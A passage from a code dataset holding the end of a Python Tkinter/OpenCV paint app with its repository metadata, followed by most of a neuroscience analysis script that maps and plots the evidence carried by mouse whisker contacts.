self.ratio)),\r\n (int(event.x * self.ratio), int(event.y * self.ratio)),\r\n (B,G,R) , thickness=self.line_width,\r\n lineType=8)\r\n self.x = event.x\r\n self.y = event.y\r\n \r\n # def refresh_side_frame(self):\r\n # try:\r\n # self.side_frame.grid_forget()\r\n # except:\r\n # pass\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.c.unbind(\"\")\r\n # self.display_image(self.filtered_image)\r\n # self.side_frame = self.brush_button.Frame(self.frame_menu)\r\n # self.side_frame.grid(row=0, column=4, rowspan=10)\r\n # self.side_frame.config(relief=GROOVE, padding=(50, 15))\r\n \r\n \r\n def upload_action(self):\r\n self.c.delete(\"all\")\r\n self.filename = filedialog.askopenfilename()\r\n self.original_image = cv2.imread(self.filename)\r\n self.edited_image = cv2.imread(self.filename)\r\n self.filtered_image = cv2.imread(self.filename)\r\n self.display_image(self.edited_image)\r\n \r\n \r\n def rotate_left_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_COUNTERCLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n\r\n\r\n def rotate_right_action(self):\r\n self.filtered_image = cv2.rotate(\r\n self.filtered_image, cv2.ROTATE_90_CLOCKWISE)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def scale_smaller(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 0.8, fy = 0.8)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def wrapx(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1)\r\n self.display_image(self.filtered_image)\r\n \r\n def wrapy(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n \r\n \r\n def scale_bigger(self):\r\n # height, width = self.filtered_image.shape[:2]\r\n self.filtered_image = cv2.resize(self.filtered_image, None, fx = 1.2, fy = 1.2)\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def translate(self):\r\n \r\n height, width = self.filtered_image.shape[:2]\r\n quarter_height, quarter_width = height / 4, width / 4\r\n T = np.float32([[1, 0, quarter_width], [0, 1, quarter_height]])\r\n self.filtered_image = cv2.warpAffine(self.filtered_image, T, (width, height))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def skew(self):\r\n rows, cols,c= self.filtered_image.shape\r\n M = np.float32([[1, 0.5, 0],\r\n \t[0, 1 , 0],\r\n \t[0, 0 , 1]]) \r\n self.filtered_image = cv2.warpPerspective(self.filtered_image,M,(int(cols*1.5),int(rows*1.5)))\r\n self.display_image(self.filtered_image)\r\n \r\n \r\n def display_image(self, image=None):\r\n self.c.delete(\"all\")\r\n if image is None:\r\n image = self.edited_image.copy()\r\n else:\r\n image = image\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n height, width , channel = image.shape\r\n ratio = height / width\r\n\r\n new_width = width\r\n new_height = height\r\n\r\n # if height > 400 or width > 300:\r\n # if ratio < 1:\r\n # new_width = 300\r\n # new_height = int(new_width * ratio)\r\n # else:\r\n # new_height = 400\r\n # new_width = int(new_height * (width / height))\r\n\r\n self.ratio = height / new_height\r\n self.new_image = cv2.resize(image, (new_width, new_height))\r\n\r\n self.new_image = ImageTk.PhotoImage(\r\n Image.fromarray(self.new_image))\r\n\r\n self.c.config(width=new_width, height=new_height)\r\n self.c.create_image(\r\n new_width / 2, new_height / 2, image=self.new_image)\r\n \r\n def save_action(self):\r\n original_file_type = self.filename.split('.')[-1]\r\n filename = filedialog.asksaveasfilename()\r\n filename = filename + \".\" + original_file_type\r\n\r\n save_as_image = self.filtered_image\r\n cv2.imwrite(filename, save_as_image)\r\n self.filename = filename\r\n \r\n # def reset(self, event):\r\n # self.old_x, self.old_y = None, None\r\n\r\nPaint()", "repo_name": "Ribal-Dahdal/Paint-App", "sub_path": "paint.py", "file_name": "paint.py", "file_ext": "py", "file_size_in_byte": 14276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.ImageTk.PhotoImage", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 27, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 51, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 51, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 82, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 82, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 94, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 94, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 101, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 101, "usage_type": "name"}, {"api_name": "tkinter.colorchooser.askcolor", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 183, "usage_type": "call"}, {"api_name": "PIL.ImageColor.getcolor", "line_number": 193, "usage_type": "call"}, {"api_name": "PIL.ImageColor", "line_number": 193, "usage_type": "name"}, {"api_name": "cv2.line", "line_number": 197, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 220, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 223, "usage_type": "call"}, {"api_name": "cv2.rotate", "line_number": 228, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_COUNTERCLOCKWISE", "line_number": 229, "usage_type": "attribute"}, {"api_name": "cv2.rotate", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.ROTATE_90_CLOCKWISE", "line_number": 235, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 241, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 247, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 268, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 269, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 275, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 278, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 288, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 288, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 304, "usage_type": "call"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 306, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 306, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 307, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 307, "usage_type": "name"}, {"api_name": "tkinter.filedialog.asksaveasfilename", "line_number": 315, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 315, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "71343659047", "text": "## Heatmap the contacts and anti-contacts in the warped plot by their evidence\n\n# Uses data:\n# big_weights_part\n# reduced_model_results_sbrc/no_opto/contact_binarized+anti_contact_count+angle+anti_angle_max\n\n\n\"\"\"\n4A, bottom; S4A, bottom\n PLOT_EDGE_SUMMARY_ONLY\n Image of the different shape positions in the consensus space\n\n4B\n PLOT_OCCUPANCY_DISCONLY\n Locations of whisks with contact and whisks without contact\n\n4C; S4B\n PLOT_EVIDENCE_DISCONLY_REWSIDEONLY\n Evidence for stimulus in both whisks with and without contact\n\nS4C\n PLOT_EVIDENCE_DISCONLY_CHOICEONLY\n Evidence for choice in both whisks with and without contact\n\"\"\"\n\nimport json\nimport os\nimport pandas\nimport numpy as np\nimport my.plot \nimport matplotlib.pyplot as plt\nimport matplotlib\nimport extras\n\n\n## Plot flags\nmy.plot.manuscript_defaults()\nmy.plot.font_embed()\n\n\n## Parameters\nwith open('../parameters') as fi:\n params = json.load(fi)\n \n \n## Load metadata about sessions\nsession_df, task2mouse, mouse2task = my.dataload.load_session_metadata(params)\nbig_tm = pandas.read_pickle(os.path.join(params['patterns_dir'], 'big_tm'))\n\n# Insert mouse and task levels into big_tm\nbig_tm = my.misc.insert_mouse_and_task_levels(\n big_tm, mouse2task, level=0, sort=True)\n\n# Count the number of trials per session\nn_trials_per_session = big_tm.groupby(['task', 'mouse', 'session']).size()\n\n# Count the number of trials per mouse\nn_trials_per_mouse = n_trials_per_session.sum(level=['task', 'mouse'])\n\n\n## Load warping data\ntransformation_df = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'transformation_df'))\nconsensus_edge_summary = pandas.read_pickle(\n os.path.join(params['scaling_dir'], 'consensus_edge_summary'))\n\n# ces to plot\ncv_ces = consensus_edge_summary.xs(50, level='stepper_pos').max(level='row')\ncc_ces = consensus_edge_summary.xs(150, level='stepper_pos').max(level='row')\nall_ces = consensus_edge_summary.max(level='row')\n\n# fillna for transparent plotting\ncv_ces[cv_ces == 0] = np.nan\ncc_ces[cc_ces == 0] = np.nan\nall_ces[all_ces == 0] = np.nan\n\n\n## Load data\nC2_whisk_cycles = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_C2_tip_whisk_cycles'))\nbig_cycle_features = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'big_cycle_features'))\n\n# This is just to plot follicle position\nmean_follicle = pandas.read_pickle(\n os.path.join(params['patterns_dir'], 'mean_follicle'))\n\n# Transform follicle\ntransformed_mean_follicle = my.misc.transform(\n mean_follicle, transformation_df).mean(level='whisker')\n\n\n## Load the original features for plotting\n# Need the original bins ('analysis_bin') to interpret the weights\nouf = pandas.read_pickle(os.path.join(params['logreg_dir'], \n 'obliviated_unaggregated_features_with_bin'))\n\n# Insert mouse and task levels into features\nouf = my.misc.insert_mouse_and_task_levels(\n ouf, mouse2task, level=0, sort=True)\n\n# Add a new bin for this analysis\nbin_edges_frames = np.linspace(-300, 100, 5)\nbin_centers_frames = (bin_edges_frames[1:] + bin_edges_frames[:-1]) / 2.0\nbin_ser = pandas.cut(\n C2_whisk_cycles['peak_frame_wrt_rwin'],\n bin_edges_frames, labels=False, right=True).rename('bin')\n\n# Append bin_ser to index\nidxdf = ouf.index.to_frame().reset_index(drop=True)\nidxdf = idxdf.join(bin_ser, on=['session', 'trial', 'cycle'])\nidxdf['bin'] = idxdf['bin'].fillna(-1).astype(np.int)\nouf.index = pandas.MultiIndex.from_frame(idxdf)\n\n# Drop null bins and reorder levels\nouf = ouf.drop(-1, level='bin')\nouf = ouf.reorder_levels(\n ['task', 'mouse', 'session', 'trial', 'bin', 'analysis_bin', 'cycle']\n ).sort_index()\n\n# Extract features of interest\ncontact_binarized = ouf['contact_binarized']\nanti_contact_count = ouf['anti_contact_count']\n\n\n## Load results of main2a1\nbig_weights_part = pandas.read_pickle('big_weights_part')\n\n# Choose the reduced_model\nreduced_model = 'contact_binarized+anti_contact_count+angle+anti_angle_max'\n\n# Use these weights\nuse_weights = big_weights_part[False]['no_opto'][reduced_model]\n\n# normalizing stuff for features that aren't raw\nnormalizing_mu = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_mu'))\nnormalizing_sigma = pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_sigma'))\n\n# Remove redundant\nnormalizing_mu = normalizing_mu.xs(\n 'rewside', level='decode_label').rename('mu').copy()\nnormalizing_sigma = normalizing_sigma.xs(\n 'rewside', level='decode_label').rename('sigma').copy()\n\n\n## Extract the locations of each contact, to be weighted by weights\n# Extract contact presence and angle onto the columns, one row per contact\nstacked_contacts = ouf[\n ['anti_angle_max', 'anti_contact_count', 'contact_binarized', 'angle']\n ].stack('label')\n\n# Drop the rows that have neither anti- nor actual contact\nstacked_contacts = stacked_contacts.loc[\n (stacked_contacts['anti_contact_count'] != 0) |\n (stacked_contacts['contact_binarized'] != 0)\n ].copy()\n\n# Join on whisk location (this is where it will be plotted)\n# TODO: join on contact location, not peak location, but probably the same\nto_join = big_cycle_features[\n ['peak_tip_x', 'peak_tip_y']].stack('whisker')\nto_join.index = to_join.index.rename('label', level='whisker')\nstacked_contacts = stacked_contacts.join(\n to_join, on=['session', 'trial', 'cycle', 'label']).sort_index()\nassert not stacked_contacts.index.duplicated().any()\n\n\n## Apply the standardization to the non-raw features\n# Only standardize these\nstandardized_features = ['anti_angle_max', 'angle']\n\n# Extract and join on sigma and mu\nto_standardize = stacked_contacts[\n standardized_features].stack().rename('value').to_frame()\nto_standardize = to_standardize.join(\n normalizing_mu,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize = to_standardize.join(\n normalizing_sigma,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize['standardized'] = to_standardize['value'].sub(\n to_standardize['mu']).divide(to_standardize['sigma'])\n\n# Drop ones that go to infinity\nto_standardize = to_standardize.loc[\n ~np.isinf(to_standardize['standardized']) &\n ~to_standardize['standardized'].isnull() &\n (to_standardize['standardized'].abs() < 10)\n ]\n\n# Put back into stacked_contacts\n# This will insert nulls where standardized angle was messed up\nto_rejoin = to_standardize['standardized'].unstack('metric')\nstacked_contacts = stacked_contacts.drop(standardized_features, axis=1)\nstacked_contacts = stacked_contacts.join(to_rejoin)\n\n\n## Transform contact location into the warped space\nto_transform = stacked_contacts[['peak_tip_x', 'peak_tip_y']]\ntransformed_contacts = my.misc.transform(\n to_transform, transformation_df).rename(\n columns={'peak_tip_x': 'transformed_x', 'peak_tip_y': 'transformed_y'})\n\n\n## Calculate the evidence of each contact\n# Stack contacts again, so that each metric (e.g. angle) is a row\nto_weight = stacked_contacts[\n ['anti_contact_count', 'contact_binarized', 'angle', 'anti_angle_max']\n ].stack().rename('value')\n\n# Get decode_label alone on columns\nflattened_weights = use_weights.stack().stack().stack().unstack('decode_label')\n\n# Rename weights\nflattened_weights = flattened_weights.rename(\n columns={'choice': 'choice_weight', 'rewside': 'rewside_weight'})\n\n# Join the weights onto the contacts\njoined = to_weight.to_frame().join(\n flattened_weights, on=flattened_weights.index.names)\n#~ assert not joined.isnull().any().any()\nassert len(joined) == len(to_weight)\n\n# Shouldn't be any nulls because they would have been dropped by stacking\n#~ assert not joined.isnull().any().any()\n\n# Apply weight\njoined['choice_evidence'] = joined['value'] * joined['choice_weight']\njoined['rewside_evidence'] = joined['value'] * joined['rewside_weight']\nevidence = joined[['choice_evidence', 'rewside_evidence']].copy()\n\n# Sum over metric\nevidence = evidence.sum(\n level=[lev for lev in evidence.index.names if lev != 'metric']\n )\n\n\n## Concat data about contacts, their transformed position, and their evidence\ncontact_evidence = pandas.concat(\n [stacked_contacts, transformed_contacts, evidence], \n axis=1, sort=True, verify_integrity=True).sort_index(axis=1)\n\n\n## Bin the contacts spatially\n# How to bin\nbins_x = np.linspace(-300, 300, 26)\nbincenters_x = (bins_x[1:] + bins_x[:-1]) / 2.0\nbins_y = np.linspace(-200, 400, 26)\nbincenters_y = (bins_y[1:] + bins_y[:-1]) / 2.0\n\n# Histogram the points\ncontact_evidence['bin_x'] = pandas.cut(\n contact_evidence['transformed_x'],\n bins=bins_x,\n labels=False, right=True)\ncontact_evidence['bin_y'] = pandas.cut(\n contact_evidence['transformed_y'],\n bins=bins_y,\n labels=False, right=True)\n\n# Drop ones outside bins\n# TODO: check this doesn't happen too much\ncontact_evidence = contact_evidence.dropna(subset=['bin_x', 'bin_y'])\ncontact_evidence['bin_x'] = contact_evidence['bin_x'].astype(np.int)\ncontact_evidence['bin_y'] = contact_evidence['bin_y'].astype(np.int)\n\n# This is used to reindex various quantities below to evenly tile the frame\nfull_spatial_bincenter_midx = pandas.MultiIndex.from_product([\n pandas.Index(range(len(bincenters_x)), name='bin_x'),\n pandas.Index(range(len(bincenters_y)), name='bin_y'),\n ], names=['bin_x', 'bin_y'])\n\n\n## Rename label to whisker\ncontact_evidence.index = contact_evidence.index.rename('whisker', level='label')\n\n\n## Drop C0 for now\ncontact_evidence = contact_evidence.drop('C0', level='whisker')\n\n\n## Split the evidence by contact vs no-contact whisks\n# A contact occurred\nyes_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] > 0) &\n (contact_evidence['anti_contact_count'] == 0)\n ]\n\n# No contact occurred\nnon_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] == 0) &\n (contact_evidence['anti_contact_count'] > 0)\n ]\n\n# On ~1.5% of whisks some double pump happened where both a contact \n# and an anti-contact happened on the same whisker\n# Those are dropped\n\n# Add this as a level\ncontact_evidence = pandas.concat([\n yes_contact_evidence, non_contact_evidence],\n axis=0, sort=True, verify_integrity=True, keys=['yes', 'non'], \n names=['contact_typ'])\n\n\n## Aggregate the evidence by spatial bins\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatial = gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Count the number of whisks that went into this mean\nn_whisks = gobj.size().rename('n_whisks')\nassert n_whisks.sum() == len(contact_evidence)\naggregated_evidence_spatial = aggregated_evidence_spatial.join(n_whisks)\n\n# Calculate whisks per trial in each bin\n# This is more appropriate for comparing across conditions\naggregated_evidence_spatial['n_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n n_trials_per_mouse)).reorder_levels(\n aggregated_evidence_spatial.index.names)\n\n# Also normalize this, so that it sums to 1 over all spatial bins\n# This is more appropriate for just looking at relative spatial distributions\nnormalizing_factor = aggregated_evidence_spatial['n_whisks'].sum(\n level=[lev for lev in aggregated_evidence_spatial.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatial['norm_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n normalizing_factor).reorder_levels(\n aggregated_evidence_spatial.index.names)\n )\n\n\n## Aggregate the evidence by spatiotemporal bins\n## TODO: normalize like above\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'bin', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatiotemporal = gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Sum occupancy\noccupancy = gobj.size().rename('n_contacts')\nassert occupancy.sum() == len(contact_evidence)\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.join(occupancy)\n\n# Normalize the occupancy to sum to 1 over the spatial bins\ncontacts_per_bin = aggregated_evidence_spatiotemporal['n_contacts'].sum(\n level=[lev for lev in aggregated_evidence_spatiotemporal.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal['occupancy'] = aggregated_evidence_spatiotemporal['n_contacts'].divide(\n contacts_per_bin).reorder_levels(aggregated_evidence_spatiotemporal.index.names)\n\n# Replace bin with bincenter\nidxdf = aggregated_evidence_spatiotemporal.index.to_frame().reset_index(drop=True)\nidxdf['frame_bin'] = idxdf['bin'].map(\n pandas.Series(bin_centers_frames, index=range(len(bin_centers_frames))))\naggregated_evidence_spatiotemporal.index = pandas.MultiIndex.from_frame(\n idxdf[['contact_typ', 'task', 'mouse', 'frame_bin', \n 'whisker', 'bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.sort_index()\n\n\n## Plot flags\nPLOT_EDGE_SUMMARY_ONLY = True\nPLOT_OCCUPANCY_DISCONLY = True\nPLOT_EVIDENCE_DISCONLY_REWSIDEONLY = True\nPLOT_EVIDENCE_DISCONLY_CHOICEONLY = True\n\n\n## Plot\nif PLOT_EDGE_SUMMARY_ONLY:\n ## Simple single axis with edge summary, for demonstration\n # Figure handle\n f, ax = plt.subplots(figsize=(3, 2.5))\n f.subplots_adjust(left=0, right=1, bottom=0, top=1)\n \n # Plot edge summary\n extras.plot_warped_edge_summary(\n ax, cv_ces=cv_ces, cc_ces=cc_ces, typ='color_by_stimulus')\n\n # Follicle\n ax.plot(\n [transformed_mean_follicle['x'].values.mean()],\n [transformed_mean_follicle['y'].values.mean()],\n marker='x', color='k', ls='none')\n\n # Pretty\n ax.axis('image')\n ax.set_xlim((-300, 300))\n ax.set_ylim((300, -200))\n ax.set_xticks([])\n ax.set_yticks([]) \n\n # Scale bar\n # 2.7mm = 60px, so 45um per px, or 222.2px per 10mm\n ax.plot([-200, -200+111.1], [275, 275], 'k-', lw=.8)\n ax.text(-200 + 55.55, 275, '5 mm', ha='center', va='bottom', size=12)\n \n # Save\n f.savefig('PLOT_EDGE_SUMMARY_ONLY.svg')\n f.savefig('PLOT_EDGE_SUMMARY_ONLY.png', dpi=300)\n\n\nif PLOT_OCCUPANCY_DISCONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'norm_whisks_per_trial'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n occupancy_vmin = 0\n occupancy_vmax = .03\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n\n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(3, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=1, bottom=0, top=.925, hspace=.3)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(location)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(location)')\n \n\n ## Spatialize occupancy\n # Mean over mice, separately by whisker\n spatialized = axis_data.mean(\n level=['whisker', 'bin_x', 'bin_y'])\n \n\n # Combine to rgb\n occupancy_rgb = extras.combine_whisker_occupancy_to_rgb(\n spatialized, full_spatial_bincenter_midx, \n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n vmin=occupancy_vmin, vmax=occupancy_vmax)\n \n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n # Normalize edge data to (0, 1) and colormap in black and white\n # This replaces masked data with the colormap's \"bad value\"\n edge_norm = matplotlib.colors.Normalize(vmin=0, vmax=1)\n edge_data_rgba = plt.cm.gray_r(edge_norm(masked_edge_data))\n\n \n ## Blend occupancy_data and edge_data\n blended_rgba = my.plot.alpha_blend_with_mask(\n edge_data_rgba, \n occupancy_rgb, \n edge_alpha,\n masked_edge_data.mask,\n )\n\n \n ## Plot\n im = my.plot.imshow(\n blended_rgba, ax=ax, \n x=all_ces.columns.values, y=all_ces.index.values)\n \n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(\n ax, transformed_mean_follicle, label_ellipses=True)\n \n # Limits\n extras.consistent_limits(ax)\n\n\n f.savefig('PLOT_OCCUPANCY_DISCONLY.svg')\n f.savefig('PLOT_OCCUPANCY_DISCONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_REWSIDEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'rewside_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -1\n evidence_vmax = 1\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n\n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n \n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.svg')\n 